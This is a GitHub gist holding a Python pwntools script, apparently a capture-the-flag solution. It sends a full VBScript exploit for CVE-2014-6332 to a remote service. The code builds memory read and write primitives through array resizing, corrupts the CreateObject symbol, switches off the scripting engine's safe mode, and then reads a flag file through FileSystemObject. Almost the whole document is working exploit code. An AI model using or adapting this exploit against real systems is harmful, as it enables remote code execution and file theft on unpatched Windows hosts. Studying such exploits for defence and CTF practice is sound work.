Skip to content

Instantly share code, notes, and snippets.

@seanwupi

seanwupi/vbs.py Secret

Created Mar 29, 2015
Embed
What would you like to do?
#!/usr/bin/env python
from pwn import * # pip install pwntools
# Ref: https://swehack.org/viewtopic.php?f=18&t=216
# CVE-2014-6332
#
# 1. Follow the steps above
# 2. Get CreateObject() by corrupt the symbol string
# 3. Turn off safemode
# 4. Create Scripting.FileSystemObject and read C:\flag.txt
r = remote('202.112.26.109', 12345)
def g(x):
y = []
for i in x.split('\n'):
if i.strip():
y.append(i.strip())
x = ':'.join(y)
r.recvuntil('>>>')
print x
r.send(x+'\n')
g('''
dim aa()
dim ab()
dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Randomize()
redim aa(5)
redim ab(5)
a0=13+17*rnd(6)
a3=7+3*rnd(5)
''')
g('''
function Over()
On Error Resume Next
dim type1,type2,type3
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000
redim Preserve aa(a0)
redim ab(a0)
redim Preserve aa(a2)
type1=1
ab(0)=1.123456789012345678901234567890
aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
If(type1=&h2f66) Then
Over=True
End If
redim Preserve aa(a0)
end function
''')
g('''
For i = 0 To 400
If Over()=True Then
Exit For
End If
Next
''')
g('''
myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
''')
g('''
sub testaa()
end sub
''')
g('''
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)
ab(0)=0
aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)
end function
''')
g('''
function rm(add)
On Error Resume Next
redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
rm=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)
end function
''')
g('Print mydata()')
addr = int(r.recvuntil('\r\n'))
print 'addr =', hex(addr)
g('''
function wm(addx)
On Error Resume Next
redim Preserve aa(a2)
aa(a1+2)(addx)=ab(4)
redim Preserve aa(a0)
end function
''')
# Get default CreateObject() back by destroy the symbol string
# addr-1167*4: C.r.e.a.t.e.O.b.j.e.c.t
g('wm(%d)' % (addr - 1167*4 - 4))
# Turn off the safemode
# int __thiscall COleScript::InSafeMode(COleScript *__hidden this)
# test byte ptr [ecx+174h], 0Bh
# push 0
# pop eax
# setnz al
# retn
g('wm(rm(rm(%d)+16)+&h174)' % (addr+8))
# Read flag
g('Set fso = CreateObject("Scripting.FileSystemObject")')
g('Set f = fso.OpenTextFile("C:\\flag.txt")')
g('Print f.ReadLine')
print r.recvuntil('}')
r.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.